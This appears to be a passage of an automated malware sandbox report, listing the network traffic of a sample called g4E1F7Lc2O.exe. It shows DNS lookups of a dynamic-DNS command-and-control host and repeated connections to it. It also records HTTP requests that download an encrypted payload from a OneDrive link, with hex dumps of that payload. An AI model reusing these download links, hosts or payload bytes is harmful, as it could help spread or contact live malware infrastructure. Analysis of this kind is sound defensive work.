                                        Sep 22, 2021 21:01:28.786637068 CEST4986454614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:01:28.939403057 CEST546144986431.3.152.100192.168.2.4
                                        Sep 22, 2021 21:01:30.158265114 CEST4986554614192.168.2.431.3.152.100

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 22, 2021 20:59:11.740108967 CEST6464653192.168.2.48.8.8.8
                                        Sep 22, 2021 20:59:11.761872053 CEST53646468.8.8.8192.168.2.4
                                        Sep 22, 2021 20:59:39.162967920 CEST6529853192.168.2.48.8.8.8
                                        Sep 22, 2021 20:59:39.196510077 CEST53652988.8.8.8192.168.2.4
                                        Sep 22, 2021 20:59:40.230003119 CEST5912353192.168.2.48.8.8.8
                                        Sep 22, 2021 20:59:40.278013945 CEST53591238.8.8.8192.168.2.4
                                        Sep 22, 2021 20:59:44.451689959 CEST5453153192.168.2.48.8.8.8
                                        Sep 22, 2021 20:59:44.472738028 CEST53545318.8.8.8192.168.2.4
                                        Sep 22, 2021 20:59:55.956077099 CEST4971453192.168.2.48.8.8.8
                                        Sep 22, 2021 20:59:56.089998007 CEST53497148.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:04.143349886 CEST5802853192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:04.162410975 CEST53580288.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:14.032588005 CEST5309753192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:14.068212986 CEST53530978.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:14.705184937 CEST4925753192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:14.722528934 CEST53492578.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:15.523736000 CEST6238953192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:15.557552099 CEST53623898.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:15.601772070 CEST4991053192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:15.643965960 CEST53499108.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:16.135875940 CEST5585453192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:16.182389021 CEST53558548.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:16.793550014 CEST6454953192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:16.843137026 CEST53645498.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:17.610656023 CEST6315353192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:17.628387928 CEST53631538.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:18.414166927 CEST5299153192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:18.433865070 CEST53529918.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:19.994534016 CEST5370053192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:20.029426098 CEST53537008.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:21.812886000 CEST5172653192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:21.883624077 CEST53517268.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:22.695580006 CEST5679453192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:22.755301952 CEST53567948.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:25.897042990 CEST5653453192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:25.918040037 CEST53565348.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:42.121140957 CEST5662753192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:42.146001101 CEST53566278.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:43.023890018 CEST5662153192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:43.065958023 CEST53566218.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:47.827071905 CEST6311653192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:47.885828972 CEST53631168.8.8.8192.168.2.4
                                        Sep 22, 2021 21:00:49.001669884 CEST6407853192.168.2.48.8.8.8
                                        Sep 22, 2021 21:00:49.082707882 CEST53640788.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:06.813260078 CEST6480153192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:06.840075970 CEST53648018.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:13.222810030 CEST6172153192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:13.259052992 CEST53617218.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:15.866420031 CEST5125553192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:15.996768951 CEST53512558.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:17.335635900 CEST6152253192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:17.466048956 CEST53615228.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:21.800792933 CEST5233753192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:21.931515932 CEST53523378.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:23.260507107 CEST5504653192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:23.391366959 CEST53550468.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:24.709548950 CEST4961253192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:24.841232061 CEST53496128.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:26.181372881 CEST4928553192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:26.315176010 CEST53492858.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:27.631864071 CEST5060153192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:27.769275904 CEST53506018.8.8.8192.168.2.4
                                        Sep 22, 2021 21:01:30.023662090 CEST6087553192.168.2.48.8.8.8
                                        Sep 22, 2021 21:01:30.153722048 CEST53608758.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Sep 22, 2021 20:59:39.162967920 CEST192.168.2.48.8.8.80x3125Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 20:59:40.230003119 CEST192.168.2.48.8.8.80x219eStandard query (0)qclcfg.sn.files.1drv.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 20:59:55.956077099 CEST192.168.2.48.8.8.80x988Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:00:42.121140957 CEST192.168.2.48.8.8.80x25bcStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:00:43.023890018 CEST192.168.2.48.8.8.80xa3ceStandard query (0)qclcfg.sn.files.1drv.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:00:47.827071905 CEST192.168.2.48.8.8.80x7f6fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:00:49.001669884 CEST192.168.2.48.8.8.80x5658Standard query (0)qclcfg.sn.files.1drv.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:15.866420031 CEST192.168.2.48.8.8.80xd7f3Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:17.335635900 CEST192.168.2.48.8.8.80x617fStandard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:21.800792933 CEST192.168.2.48.8.8.80xbd38Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:23.260507107 CEST192.168.2.48.8.8.80xc3feStandard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:24.709548950 CEST192.168.2.48.8.8.80xe733Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:26.181372881 CEST192.168.2.48.8.8.80xe58Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:27.631864071 CEST192.168.2.48.8.8.80x38b9Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:30.023662090 CEST192.168.2.48.8.8.80xdf46Standard query (0)trapboijiggy.dvrlists.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Sep 22, 2021 20:59:39.196510077 CEST8.8.8.8192.168.2.40x3125No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 20:59:40.278013945 CEST8.8.8.8192.168.2.40x219eNo error (0)qclcfg.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 20:59:40.278013945 CEST8.8.8.8192.168.2.40x219eNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 20:59:40.278013945 CEST8.8.8.8192.168.2.40x219eNo error (0)sn-files.ha.1drv.com40.79.207.82A (IP address)IN (0x0001)
                                        Sep 22, 2021 20:59:56.089998007 CEST8.8.8.8192.168.2.40x988No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:00:42.146001101 CEST8.8.8.8192.168.2.40x25bcNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 21:00:43.065958023 CEST8.8.8.8192.168.2.40xa3ceNo error (0)qclcfg.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 21:00:43.065958023 CEST8.8.8.8192.168.2.40xa3ceNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 21:00:43.065958023 CEST8.8.8.8192.168.2.40xa3ceNo error (0)sn-files.ha.1drv.com40.79.207.82A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:00:47.885828972 CEST8.8.8.8192.168.2.40x7f6fNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 21:00:49.082707882 CEST8.8.8.8192.168.2.40x5658No error (0)qclcfg.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 21:00:49.082707882 CEST8.8.8.8192.168.2.40x5658No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 22, 2021 21:00:49.082707882 CEST8.8.8.8192.168.2.40x5658No error (0)sn-files.ha.1drv.com40.79.207.80A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:15.996768951 CEST8.8.8.8192.168.2.40xd7f3No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:17.466048956 CEST8.8.8.8192.168.2.40x617fNo error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:21.931515932 CEST8.8.8.8192.168.2.40xbd38No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:23.391366959 CEST8.8.8.8192.168.2.40xc3feNo error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:24.841232061 CEST8.8.8.8192.168.2.40xe733No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:26.315176010 CEST8.8.8.8192.168.2.40xe58No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:27.769275904 CEST8.8.8.8192.168.2.40x38b9No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                        Sep 22, 2021 21:01:30.153722048 CEST8.8.8.8192.168.2.40xdf46No error (0)trapboijiggy.dvrlists.com31.3.152.100A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • qclcfg.sn.files.1drv.com

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44975240.79.207.82443C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-22 18:59:40 UTC0OUTGET /y4mtCv4Bci6Hac_003x4VqzvkaJ-Z7nxrwXcb5jXVlYKlkhzWcxF7Vo37EbW_a-xuXuD_W5Kw2en7grAo9VbJ93WjIPSIXnkhhC01YboquwGm2AIlaKoBHi_6VZm402f9HRyjx263a6hGcO_detpGkOuS1Iilkybf-0BKA08CLK0ztz37lt8lonO0Gj45brJhwsjCvER4HfRxI_WR-8c3FzLA/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 18:59:41 UTC0INHTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 18:59:41 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF38B6DF99D
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: ffY3BCotVkGd3OKyJLNfBA.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 18:59:40 GMT
                                        Connection: close
                                        2021-09-22 18:59:41 UTC1INData Raw: 04 19 56 53 dd f5 a9 08 25 64 6b e9 8b b1 1b 4f 38 8b af 16 d8 60 6f 8b bb 2c f1 8e 86 73 cb 8b fe 4e fa 70 44 e5 c4 bc ea 6f c2 f6 69 b7 5f 9f 2b 2b 2d 32 bc de 34 c0 f3 e3 bf 31 3b 70 44 e5 c4 fe 7a 5a 14 7e 63 a8 bf 45 66 2f 36 c4 fc 36 c5 5e 1d 0e 6e 42 e0 39 4c f2 60 21 19 32 bd 6d be ef d9 e9 cc 2d 32 bc ea 4d 78 56 0b eb d1 98 9a 94 93 10 73 ca 09 a3 34 e1 bb 69 b5 59 92 8e 86 76 51 80 66 1a 88 78 56 0a 65 ec 53 a5 38 cb 8b fd f8 6d be ef d9 a9 40 ef d9 a8 be ef d9 e9 cc 2d 32 bc ea 4d 78 56 5b f6 0f 91 63 f8 3f 0a 03 b2 86 27 4a a3 04 68 6b ee 0e 3b 7f b1 01 80 08 44 d4 2f 40 89 94 c3 5c 32 d9 c6 54 5f c8 5d f4 34 93 42 86 10 21 4b 1c df 87 c6 58 47 32 e8 65 f8 3e 85 9d 03 e6 76 27 77 bc ba c3 53 e1 d4 4b 2b 7a 03 b6 b2 84 22 c9 e0 5d c9 d5 ce 43
                                        Data Ascii: VS%dkO8`o,sNpDoi_++-241;pDzZ~cEf/66^nB9L`!2m-2MxVs4iYvQfxVeS8m@-2MxV[c?'Jhk;D/@\2T_]4B!KXG2e>v'wSK+z"]C


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.44975440.79.207.82443C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-22 18:59:42 UTC16OUTGET /y4m8McKW7eldeu5q_fP_bF_m4iIq9osyPE57I7rb1_kM5QoBiqAdrxu2i4qYsOeelfS41khT2ygF2f_VC8v9Gn9G6LiEo3xeFj2gjsgQ3adajTXfShfNZuLPOgblEcRWeMAIqqfjDN3FOsy9v8A4xdiV5xQBr9C6Kp1gGFU_0W7UGH2I4sJxFO9E7heD-2idKZGLE2Y9wCDd3h9KtX1_VCCjQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: aswe
                                        Cache-Control: no-cache
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 18:59:42 UTC16INHTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 18:59:42 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF028C1CB80
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: 84m6SgaHxUqN1dTx+/mcFw.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 18:59:42 GMT
                                        Connection: close
                                        2021-09-22 18:59:42 UTC17INData Raw: 04 19 56 53 dd f5 a9 08 25 64 6b e9 8b b1 1b 4f 38 8b af 16 d8 60 6f 8b bb 2c f1 8e 86 73 cb 8b fe 4e fa 70 44 e5 c4 bc ea 6f c2 f6 69 b7 5f 9f 2b 2b 2d 32 bc de 34 c0 f3 e3 bf 31 3b 70 44 e5 c4 fe 7a 5a 14 7e 63 a8 bf 45 66 2f 36 c4 fc 36 c5 5e 1d 0e 6e 42 e0 39 4c f2 60 21 19 32 bd 6d be ef d9 e9 cc 2d 32 bc ea 4d 78 56 0b eb d1 98 9a 94 93 10 73 ca 09 a3 34 e1 bb 69 b5 59 92 8e 86 76 51 80 66 1a 88 78 56 0a 65 ec 53 a5 38 cb 8b fd f8 6d be ef d9 a9 40 ef d9 a8 be ef d9 e9 cc 2d 32 bc ea 4d 78 56 5b f6 0f 91 63 f8 3f 0a 03 b2 86 27 4a a3 04 68 6b ee 0e 3b 7f b1 01 80 08 44 d4 2f 40 89 94 c3 5c 32 d9 c6 54 5f c8 5d f4 34 93 42 86 10 21 4b 1c df 87 c6 58 47 32 e8 65 f8 3e 85 9d 03 e6 76 27 77 bc ba c3 53 e1 d4 4b 2b 7a 03 b6 b2 84 22 c9 e0 5d c9 d5 ce 43
                                        Data Ascii: VS%dkO8`o,sNpDoi_++-241;pDzZ~cEf/66^nB9L`!2m-2MxVs4iYvQfxVeS8m@-2MxV[c?'Jhk;D/@\2T_]4B!KXG2e>v'wSK+z"]C
                                        2021-09-22 18:59:42 UTC32INData Raw: 75 c3 17 0b f3 56 2e 46 7d bb ee 5f af 4d d0 ef 6a 77 1d 0d 5c 88 85 b4 3d d2 f3 10 c5 4f 49 c9 e0 28 6e 70 02 8c e5 af 7a 69 af 1f e7 01 5c 02 d2 cb d8 b0 10 31 56 ab 10 b4 bb fd 19 9e b9 e7 86 97 2a a7 77 a7 62 2d 58 31 f9 08 79 65 c3 3c 96 95 72 6b 2a c5 22 e6 4b 10 1d 1f 1c 0e 84 f1 f7 69 8d 0d e2 58 5b 06 94 a7 9d b7 95 30 be 1e 83 c5 9b 82 75 c3 df 39 49 7c 98 8d 57 c1 f7 b7 95 e5 17 87 4f 24 c0 f1 ec 6d f1 34 ed 85 ad 45 37 69 b3 40 af 99 1d f1 41 18 e3 b3 6b 1d e4 d9 19 9d d6 ff a6 74 a6 f6 6e cf ab 32 87 3c 65 b1 1a fd 20 f7 48 40 bb c9 bb 40 40 70 69 76 7a 2e 92 0d 27 da 06 2d fa 7b a2 e6 af e5 94 84 9a e6 25 c6 51 c2 16 09 89 f0 7e c9 f5 aa 2b 69 90 2e f4 28 a7 18 d9 c5 00 65 01 7c c3 50 14 9d 29 ee 82 91 71 93 48 23 29 57 20 b5 e1 51 6c cd 04
                                        Data Ascii: uV.F}_Mjw\=OI(npzi\1V*wb-X1ye<rk*"KiX[0u9I|WO$m4E7i@Aktn2<e H@@@pivz.'-{%Q~+i.(e|P)qH#)W Ql
                                        2021-09-22 18:59:42 UTC48INData Raw: 16 1f 9f 0f 59 4c 6a 92 81 3d 70 84 3a c7 15 38 d6 ce 08 7a f2 ed 06 7a 37 e3 1b c1 ef 44 83 4b 30 75 b9 09 b2 71 88 5f e6 c6 bc e9 f4 24 f8 80 97 29 c1 c3 55 77 28 07 bb ef 8e 5c 81 60 a4 f4 3c 0c 71 2c ce d9 ef 8e 3e 79 2e 22 53 e7 8a 6d b9 a8 59 75 6b 87 d8 40 4e a5 e0 2a 47 51 9e 1f f2 42 87 f1 0c 4b a4 c2 2c b7 7f c9 71 66 f6 86 af 7c 7b 4e 4e 6c 7d af 56 6d c5 cc ec 2c 47 ba 91 8a a9 8d 56 c4 9f 63 9c 33 b7 69 ab 4e 59 74 90 c7 68 60 00 01 6b 6b 04 e7 8a 53 15 3f 2c cf bb c4 9c 91 e6 d3 22 d9 67 02 6e 3d 17 07 22 b2 04 4a 2d 04 64 de 9e e6 f0 7c 0c 26 c8 97 1a f1 cc 7a e4 06 b4 ee f2 4c 88 f2 a9 ad ea 5d ea 65 ce a0 c8 4a 99 46 53 8b f3 ef 79 b7 a0 2c 1d 52 eb 14 15 aa 76 95 75 14 f7 40 91 e9 e8 22 59 84 77 d3 38 17 42 1c 3d c3 84 10 73 16 5e 9d 0c
                                        Data Ascii: YLj=p:8zz7DK0uq_$)Uw(\`<q,>y."SmYuk@N*GQBK,qf|{NNl}Vm,GVc3iNYth`kkS?,"gn="J-d|&zL]eJFSy,Rvu@"Yw8B=s^
                                        2021-09-22 18:59:43 UTC64INData Raw: 8a e1 fd 34 e1 16 1e 16 ac 7b 07 02 e2 90 03 f8 2b ff 9e 64 ae d4 7a 54 2d 8d 0d a2 5a d1 03 44 bd 88 55 7c 87 5d 09 b7 d9 6b 05 09 75 5c b0 96 b1 04 68 91 e3 60 14 d5 c3 f7 d6 2d 32 5a bc 59 28 97 8f 04 7b cd 42 51 77 76 02 2b 52 61 8d c8 a4 94 0c 65 50 4c f5 78 dd 7c e7 3e 05 55 97 d1 5c b8 73 65 37 f7 23 3e 40 6d 4e 2e 74 33 02 39 61 80 9f 50 07 65 e7 73 90 7e 2a 4e 65 d3 63 b7 20 4c 28 f9 6a c7 fa 3f 38 a5 c1 b7 70 ea db 49 16 b7 b1 cf ec 99 ab 34 99 ee 3a b0 4c b5 a8 02 66 10 ee 9e 82 69 63 73 41 42 ee ee 6a 48 ef a4 53 d1 13 85 69 59 4c 0e 87 20 79 f2 27 47 05 f8 72 c9 c5 65 fc e8 e6 56 1c e1 4b e4 e9 7e be 0c a8 2b 3d 7e 3e d3 56 c7 56 dc 81 cf 69 f1 a8 36 27 68 c2 38 9c ec be 2c 39 66 78 2e dc 4c 21 ea d9 6e 54 29 08 9a 07 07 64 6c 9e 92 df a5 cd
                                        Data Ascii: 4{+dzT-ZDU|]ku\h`-2ZY({BQwv+RaePLx|>U\se7#>@mN.t39aPes~*Nec L(j?8pI4:LficsABjHSiYL y'GreVK~+=~>VVi6'h8,9fx.L!nT)dl
                                        2021-09-22 18:59:43 UTC80INData Raw: b2 e1 f7 89 aa ea be dc 51 c3 9e 7c 94 fc d6 a8 b3 a7 d1 93 44 e9 aa 0b 0a 62 71 cc 92 84 cd 3d df cf c6 65 4d 32 4b 65 77 3f 59 82 54 4a ab a6 dd 36 6b 05 01 95 ef 7f 7d 4d ac 9e ee e9 be 62 11 f1 d4 58 d7 b3 ae 8d 84 6c a2 d0 be a7 38 02 91 d2 3a d3 6d 4f b3 33 43 ed dd f7 9e c1 2c 53 77 4b f5 f4 d3 0e 65 92 99 04 2c f0 19 20 e5 12 89 39 df c5 d9 3b 5c 53 4b a0 9f 5e 28 8b d5 03 29 5c e6 b6 c5 8e 4b 23 fd e6 92 4d 97 89 9f 26 79 b5 f6 87 08 4e a8 47 05 71 89 00 4d 3c 8c 0b c6 76 48 24 1b 81 8d 6a c4 5a c9 4f 68 e9 90 57 bf fb 0e 19 a1 89 37 d0 94 0b dd 54 09 f3 bc 81 ec e8 88 96 5b d1 4a 85 48 3e f1 24 85 3e e6 c4 fb eb 62 fe 84 7d 65 50 9c 69 b0 72 55 94 c7 c6 dd 0c ab 52 ec c5 06 93 be 01 ae 6f 9b 79 5d 19 7e 4f ae 86 ea 90 08 3c 4d f4 5c 43 d2 a7 f6
                                        Data Ascii: Q|Dbq=eM2Kew?YTJ6k}MbXl8:mO3C,SwKe, 9;\SK^()\K#M&yNGqM<vH$jZOhW7T[JH>$>b}ePirURoy]~O<M\C
                                        2021-09-22 18:59:43 UTC96INData Raw: 7a 88 0f cd 58 f1 b2 15 d3 21 b6 6f 37 7b 98 94 9f fa 99 c9 d6 8c 20 bb 0f 09 13 3d 14 7b f9 0d 85 b5 76 6b 6e 2a 8e 60 fa 25 4c 6f 30 17 f4 06 1a d8 1e 20 2b 73 b9 84 ca c4 9d 70 01 7a c2 bb 52 d9 40 b9 5f 91 ba 6c df ed fa 64 eb 6f 79 e5 33 66 c4 09 89 da a0 a8 56 c0 5c fa 4a 7c 02 cf 3e 1e dc a2 f9 c5 79 63 a6 90 df 5e 10 2f 23 87 88 b3 ff a2 a0 7f 40 ca 29 4a f9 94 55 31 1b c8 83 56 c5 8f d0 8f 84 fc a2 51 c8 60 31 f5 ec 4f 44 9c 1d 76 2c dd d4 49 67 7f 56 14 be 36 c7 06 a3 79 e1 be 73 76 62 9f 6a d4 81 b5 79 1c 40 d5 df df 89 a8 21 c2 da 1d 63 6f 5e 0f 81 aa 45 26 43 8c e9 90 bb 1b 38 e3 91 bb 0e cb 8a 69 01 24 bc 73 b5 e0 f3 d5 f6 92 13 24 4e 30 1f 6f db bc 11 6e d7 4b 13 24 bd 22 13 a3 c0 2b 6e 7e 52 b0 5f 37 8c 79 74 4c 85 6f 93 72 e8 7a 49 04 9a
                                        Data Ascii: zX!o7{ ={vkn*`%Lo0 +spzR@_ldoy3fV\J|>yc^/#@)JU1VQ`1ODv,IgV6ysvbjy@!co^E&C8i$s$N0onK$"+n~R_7ytLorzI
                                        2021-09-22 18:59:43 UTC112INData Raw: 76 d8 b7 e3 39 79 92 fe 81 8d c7 94 ea 61 0c 61 e0 93 e7 9a 63 15 c2 60 90 d2 cb 1a 42 a9 85 eb 4e 25 9d 23 ae 91 cc b5 49 b8 2b 69 49 f6 dc 2e 5c 46 cc 14 0c 95 56 ce 97 9a 00 f6 23 7d c5 6e c0 c2 c7 ce 46 4a fe 6d 8a 34 7e a5 70 b7 71 e1 89 d3 d5 2c ac ab 31 37 57 b2 3e d8 1b 92 b7 8c 03 ed 94 57 24 ec 64 ba 20 d7 ec 60 8a 88 e9 dd c1 e2 34 9f b5 84 ec 40 61 f7 3b 8c f6 60 bb df 4e 2b c6 a1 c6 c0 80 48 1f db d3 d5 b5 05 e6 93 11 04 07 cc fe 36 4f 9a 89 24 fe 6e 28 a2 f2 b7 d8 f3 58 85 39 c8 e9 13 ed d9 d3 23 02 2f 2a 06 fa 60 d7 eb 83 c7 95 52 81 90 5e 09 df 00 00 7c 87 4c 27 66 af 31 29 72 09 ba e8 a2 3e b0 ed 32 21 4f 93 8c 49 e6 10 b5 cc fb 5b 2c 64 e4 b0 f4 dd d7 a6 8b 5b 48 11 a9 98 fa a9 6c 41 b2 ce 8c 35 a5 5e f3 a3 9e c0 eb 59 0b 32 a0 44 7b cc
                                        Data Ascii: v9yaac`BN%#I+iI.\FV#}nFJm4~pq,17W>W$d `4@a;`N+H6O$n(X9#/*`R^|L'f1)r>2!OI[,d[HlA5^Y2D{
